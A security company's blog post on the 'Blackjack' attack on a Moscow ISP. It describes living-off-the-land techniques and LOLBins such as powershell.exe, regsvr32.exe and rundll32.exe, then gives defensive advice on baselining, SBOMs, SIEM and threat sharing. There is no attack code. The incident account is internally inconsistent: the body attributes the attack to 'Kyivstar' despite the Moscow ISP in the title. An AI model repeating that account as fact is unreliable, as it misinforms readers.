TeamWorx Takeaways: Ukrainian “Blackjack” Hackers Take Out Russian ISP

While we’d all like to think that we’re immune to insider threats, the recent “Blackjack” attack on a Moscow ISP demonstrates one tactic adversaries can use to gain initial access to a system and remain undetected. This kind of access can be granted either intentionally (indicating malicious intent) or unintentionally by, for instance, clicking on a malicious URL. In the case of the Kyivstar attacks, however, we’d like to focus on a tactic that has been used countless times in large scale attacks – Living off the Land (LOTL.) 

These attacks are fileless in nature, meaning they do not require an attacker to install any code or scripts within the target system. Instead, the attacker uses tools that are already present in the environment. The use of these native tools makes LOTL attacks far more difficult to detect, especially if the target organization leverages traditional security tools that can only search for known malware scripts or files. This gap in the security toolset enables the hacker to dwell undetected in the victim’s environment for weeks, months or even years. If applied correctly, this principle could imply that the insider breached as early as May 2023 and then watched, waited and fit in with “normal traffic and activity.” Leveraged by foreign intelligence services for years, this tactic can also enable the attacker to slowly exfiltrate data over time while remaining undetected.

This type of attack also requires a knowledge of defense evasion techniques specific to the type of target system—in this case, Kyivstar's communication system. Adversaries routinely hijack Domain Naming System (DNS) protocol to obfuscate command and control channels. This technique requires defenders to understand the target protocol at a very detailed level, or have signatures created to detect anomalous packet sizes or behaviors within such protocol. As is often the case with other LOTL attacks (think Volt Typhoon against Guam’s critical infrastructure,) time was clearly on the attacker’s side once they gained initial access.

Several notable cyberattacks have utilized LOTL techniques, also referred to as living-off-the-land binaries or LOLBins, to achieve their objectives. These attacks highlight this technique’s versatility and effectiveness in bypassing security measures. Here are some prominent examples using common operating system files:

• Stuxnet: Although primarily known for its use of zero-day exploits, the Stuxnet worm also used standard system tools as part of its payload delivery and execution process, leveraging the trusted status of these tools to remain undetected.
• Dridex Malware: This banking Trojan has evolved to use LOLBins in its infection process. Tools like powershell.exe have been used to download and execute the next stages of the malware.
• TrickBot: This banking Trojan, known for its modular design, has utilized LOLBins, such as regsvr32.exe and rundll32.exe, to load malicious DLLs and evade detection.

How can countries identify hidden threats in critical infrastructure?

As previously mentioned, LOLBins attacks are extremely difficult to detect and/or uncover and could operate within your environment undetected for an extended amount of time. These techniques are designed to counteract some of the most advanced detection tools we have at our disposal today. Common advantages of LOLBins include evasion of security measures, difficulties in detection, attack versatility and, of course, persistence. Defending against LOLBins involves a multi-layered approach, as these legitimate tools are often not detected by standard security measures employed within critical infrastructure companies. This starts with knowing your environment, its routine behavior and the potential threats that can target your environment.

Most defenses against these hidden threats center around detection. Knowing your infrastructure and its common behaviors will allow for a more comprehensive, active defense against common attack techniques, like LOLBins. Employing auditing and monitoring techniques against known system baselines can help defenders identify irregularities or non-standard behavior. In addition, a Software Bill of Materials (SBOM) can help defenders better understand how their systems are being built, along with what they’re being built with, enable them to baseline systems, implement defense-in-depth strategies and employ tools, like Security Information and Event Management (SIEM) solutions. This approach empowers critical infrastructure organizations to understand and visualize "what right looks like." 

This complete and proactive understanding of threats that target our critical infrastructure could also be enhanced significantly by expansive partnerships between the public and private sector, across international boundaries and state-lines, and across titles and authorities. It’s not easy to detect LOLBins attacks as a single organization with limited resources and expertise—but, the ability to share potential threat data more quickly and leverage partnered expertise from across the globe can be invaluable as a team works to get ahead of a threat or vulnerability before it becomes an incident...or eradicate a threat that has already infiltrated its systems.

Final thoughts and takeaways 

The threat of LOLBins lies in their legitimate appearance and versatile nature, which make them a stealthy and effective tool for attackers. Awareness and monitoring of the usage of these tools are essential in a comprehensive cybersecurity strategy. At the end of the day, defending against known and unknown threats will require shared awareness, collaboration, transparent system knowledge and auditing, monitoring and user training.